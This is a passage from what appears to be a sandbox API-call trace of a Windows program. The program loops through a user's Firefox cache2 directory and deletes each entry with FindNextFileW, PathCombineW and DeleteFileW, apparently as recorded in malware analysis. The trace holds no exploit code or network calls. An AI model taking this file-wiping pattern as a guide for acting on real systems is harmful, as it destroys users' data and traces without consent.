"c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\21870284bd46d6f21e756ff12837e26ac55d301d")) returned 1 [0253.607] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.607] lstrlenW (lpString="21B0E0F8C11507CB07A1BB82407F5AD646D80836") returned 40 [0253.607] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="21B0E0F8C11507CB07A1BB82407F5AD646D80836" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\21B0E0F8C11507CB07A1BB82407F5AD646D80836") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\21B0E0F8C11507CB07A1BB82407F5AD646D80836" [0253.607] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\21B0E0F8C11507CB07A1BB82407F5AD646D80836" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\21b0e0f8c11507cb07a1bb82407f5ad646d80836")) returned 1 [0253.608] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.608] lstrlenW (lpString="224A275AD09BE370F96D409F6AFE2904589080EC") returned 40 [0253.608] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="224A275AD09BE370F96D409F6AFE2904589080EC" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\224A275AD09BE370F96D409F6AFE2904589080EC") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\224A275AD09BE370F96D409F6AFE2904589080EC" [0253.609] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\224A275AD09BE370F96D409F6AFE2904589080EC" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\224a275ad09be370f96d409f6afe2904589080ec")) returned 1 [0253.610] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.610] lstrlenW (lpString="225640F98EF31B52AB76CF756A5C3512E0BDE89B") returned 40 [0253.610] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="225640F98EF31B52AB76CF756A5C3512E0BDE89B" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\225640F98EF31B52AB76CF756A5C3512E0BDE89B") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\225640F98EF31B52AB76CF756A5C3512E0BDE89B" [0253.610] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\225640F98EF31B52AB76CF756A5C3512E0BDE89B" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\225640f98ef31b52ab76cf756a5c3512e0bde89b")) returned 1 [0253.611] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.611] lstrlenW (lpString="22777C6913A6B4768EE40D5F0103A93D8B477C3C") returned 40 [0253.611] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="22777C6913A6B4768EE40D5F0103A93D8B477C3C" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\22777C6913A6B4768EE40D5F0103A93D8B477C3C") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\22777C6913A6B4768EE40D5F0103A93D8B477C3C" [0253.611] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\22777C6913A6B4768EE40D5F0103A93D8B477C3C" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\22777c6913a6b4768ee40d5f0103a93d8b477c3c")) returned 1 [0253.612] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.612] lstrlenW (lpString="22B072DE2E829A9BBDD29C6C1005CBE946651C89") returned 40 [0253.612] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="22B072DE2E829A9BBDD29C6C1005CBE946651C89" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\22B072DE2E829A9BBDD29C6C1005CBE946651C89") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\22B072DE2E829A9BBDD29C6C1005CBE946651C89" [0253.612] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\22B072DE2E829A9BBDD29C6C1005CBE946651C89" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\22b072de2e829a9bbdd29c6c1005cbe946651c89")) returned 1 [0253.612] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.612] lstrlenW (lpString="22CA1C7BCD8AA6B0D991889ABE75C06CA1EBACD1") returned 40 [0253.612] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="22CA1C7BCD8AA6B0D991889ABE75C06CA1EBACD1" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\22CA1C7BCD8AA6B0D991889ABE75C06CA1EBACD1") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\22CA1C7BCD8AA6B0D991889ABE75C06CA1EBACD1" [0253.613] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\22CA1C7BCD8AA6B0D991889ABE75C06CA1EBACD1" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\22ca1c7bcd8aa6b0d991889abe75c06ca1ebacd1")) returned 1 [0253.614] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.614] lstrlenW (lpString="24073350A672357B47B2D1A937642146E80AA938") returned 40 [0253.614] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="24073350A672357B47B2D1A937642146E80AA938" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\24073350A672357B47B2D1A937642146E80AA938") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\24073350A672357B47B2D1A937642146E80AA938" [0253.614] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\24073350A672357B47B2D1A937642146E80AA938" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\24073350a672357b47b2d1a937642146e80aa938")) returned 1 [0253.615] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.617] lstrlenW (lpString="2445FA966A09E6B22679F2707AA980BBEBBC3BA8") returned 40 [0253.617] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2445FA966A09E6B22679F2707AA980BBEBBC3BA8" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2445FA966A09E6B22679F2707AA980BBEBBC3BA8") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2445FA966A09E6B22679F2707AA980BBEBBC3BA8" [0253.617] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2445FA966A09E6B22679F2707AA980BBEBBC3BA8" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2445fa966a09e6b22679f2707aa980bbebbc3ba8")) returned 1 [0253.618] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.618] lstrlenW (lpString="245CEDA973B44C04325E8F3063F7596F9C88F120") returned 40 [0253.618] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="245CEDA973B44C04325E8F3063F7596F9C88F120" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\245CEDA973B44C04325E8F3063F7596F9C88F120") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\245CEDA973B44C04325E8F3063F7596F9C88F120" [0253.618] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\245CEDA973B44C04325E8F3063F7596F9C88F120" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\245ceda973b44c04325e8f3063f7596f9c88f120")) returned 1 [0253.618] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.618] lstrlenW (lpString="2465113476A71563C2561E1A45DF343E04BFF787") returned 40 [0253.618] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2465113476A71563C2561E1A45DF343E04BFF787" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2465113476A71563C2561E1A45DF343E04BFF787") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2465113476A71563C2561E1A45DF343E04BFF787" [0253.618] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2465113476A71563C2561E1A45DF343E04BFF787" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2465113476a71563c2561e1a45df343e04bff787")) returned 1 [0253.619] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.619] lstrlenW (lpString="24BE475A5C9CE3DA33684DFDEE6AC47BC9BA6DE6") returned 40 [0253.619] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="24BE475A5C9CE3DA33684DFDEE6AC47BC9BA6DE6" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\24BE475A5C9CE3DA33684DFDEE6AC47BC9BA6DE6") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\24BE475A5C9CE3DA33684DFDEE6AC47BC9BA6DE6" [0253.619] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\24BE475A5C9CE3DA33684DFDEE6AC47BC9BA6DE6" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\24be475a5c9ce3da33684dfdee6ac47bc9ba6de6")) returned 1 [0253.620] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.620] lstrlenW (lpString="24C5A11C7C55D609ED86B6E31E2C94301D075CB3") returned 40 [0253.620] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="24C5A11C7C55D609ED86B6E31E2C94301D075CB3" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\24C5A11C7C55D609ED86B6E31E2C94301D075CB3") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\24C5A11C7C55D609ED86B6E31E2C94301D075CB3" [0253.620] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\24C5A11C7C55D609ED86B6E31E2C94301D075CB3" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\24c5a11c7c55d609ed86b6e31e2c94301d075cb3")) returned 1 [0253.622] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.622] lstrlenW (lpString="24F9514653FD834D9D33E21B4C0AECB308550A9A") returned 40 [0253.622] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="24F9514653FD834D9D33E21B4C0AECB308550A9A" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\24F9514653FD834D9D33E21B4C0AECB308550A9A") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\24F9514653FD834D9D33E21B4C0AECB308550A9A" [0253.622] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\24F9514653FD834D9D33E21B4C0AECB308550A9A" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\24f9514653fd834d9d33e21b4c0aecb308550a9a")) returned 1 [0253.622] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.622] lstrlenW (lpString="2530EF3224B6681D2B34ED5DB0B170C716EB1E39") returned 40 [0253.622] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2530EF3224B6681D2B34ED5DB0B170C716EB1E39" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2530EF3224B6681D2B34ED5DB0B170C716EB1E39") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2530EF3224B6681D2B34ED5DB0B170C716EB1E39" [0253.622] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2530EF3224B6681D2B34ED5DB0B170C716EB1E39" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2530ef3224b6681d2b34ed5db0b170c716eb1e39")) returned 1 [0253.623] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.623] lstrlenW (lpString="2587F851FECE6E69F3B26E54EDE4E02BD3C1D496") returned 40 [0253.623] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2587F851FECE6E69F3B26E54EDE4E02BD3C1D496" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2587F851FECE6E69F3B26E54EDE4E02BD3C1D496") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2587F851FECE6E69F3B26E54EDE4E02BD3C1D496" [0253.623] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2587F851FECE6E69F3B26E54EDE4E02BD3C1D496" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2587f851fece6e69f3b26e54ede4e02bd3c1d496")) returned 1 [0253.624] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.624] lstrlenW (lpString="2598A1CBB2EA6DB15DFF6382E5B17F41B01B4F0E") returned 40 [0253.624] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2598A1CBB2EA6DB15DFF6382E5B17F41B01B4F0E" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2598A1CBB2EA6DB15DFF6382E5B17F41B01B4F0E") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2598A1CBB2EA6DB15DFF6382E5B17F41B01B4F0E" [0253.624] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2598A1CBB2EA6DB15DFF6382E5B17F41B01B4F0E" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2598a1cbb2ea6db15dff6382e5b17f41b01b4f0e")) returned 1 [0253.625] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.625] lstrlenW (lpString="25AFA0D28E7333EEE9F600A4A4F5B1C37A33789F") returned 40 [0253.625] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="25AFA0D28E7333EEE9F600A4A4F5B1C37A33789F" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\25AFA0D28E7333EEE9F600A4A4F5B1C37A33789F") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\25AFA0D28E7333EEE9F600A4A4F5B1C37A33789F" [0253.625] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\25AFA0D28E7333EEE9F600A4A4F5B1C37A33789F" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\25afa0d28e7333eee9f600a4a4f5b1c37a33789f")) returned 1 [0253.626] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.626] lstrlenW (lpString="26686166E96A3EBDAC2ED90D8F9B4ECD22BBB577") returned 40 [0253.626] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="26686166E96A3EBDAC2ED90D8F9B4ECD22BBB577" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\26686166E96A3EBDAC2ED90D8F9B4ECD22BBB577") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\26686166E96A3EBDAC2ED90D8F9B4ECD22BBB577" [0253.626] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\26686166E96A3EBDAC2ED90D8F9B4ECD22BBB577" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\26686166e96a3ebdac2ed90d8f9b4ecd22bbb577")) returned 1 [0253.627] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.627] lstrlenW (lpString="26926D1CDB0298F2781D6FAD532518F7C8B787DA") returned 40 [0253.627] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="26926D1CDB0298F2781D6FAD532518F7C8B787DA" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\26926D1CDB0298F2781D6FAD532518F7C8B787DA") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\26926D1CDB0298F2781D6FAD532518F7C8B787DA" [0253.627] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\26926D1CDB0298F2781D6FAD532518F7C8B787DA" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\26926d1cdb0298f2781d6fad532518f7c8b787da")) returned 1 [0253.629] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.629] lstrlenW (lpString="26C8D0872DE7292BC9C7F54426A5E887557300EA") returned 40 [0253.629] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="26C8D0872DE7292BC9C7F54426A5E887557300EA" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\26C8D0872DE7292BC9C7F54426A5E887557300EA") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\26C8D0872DE7292BC9C7F54426A5E887557300EA" [0253.629] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\26C8D0872DE7292BC9C7F54426A5E887557300EA" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\26c8d0872de7292bc9c7f54426a5e887557300ea")) returned 1 [0253.630] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.630] lstrlenW (lpString="26D5902E65F2EC88B7E5ED33E815A3FDBE18E10F") returned 40 [0253.630] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="26D5902E65F2EC88B7E5ED33E815A3FDBE18E10F" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\26D5902E65F2EC88B7E5ED33E815A3FDBE18E10F") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\26D5902E65F2EC88B7E5ED33E815A3FDBE18E10F" [0253.630] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\26D5902E65F2EC88B7E5ED33E815A3FDBE18E10F" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\26d5902e65f2ec88b7e5ed33e815a3fdbe18e10f")) returned 1 [0253.630] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.630] lstrlenW (lpString="270900E85767111BD4C54667E304A0B6656EA0A0") returned 40 [0253.630] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="270900E85767111BD4C54667E304A0B6656EA0A0" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\270900E85767111BD4C54667E304A0B6656EA0A0") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\270900E85767111BD4C54667E304A0B6656EA0A0" [0253.630] DeleteFileW 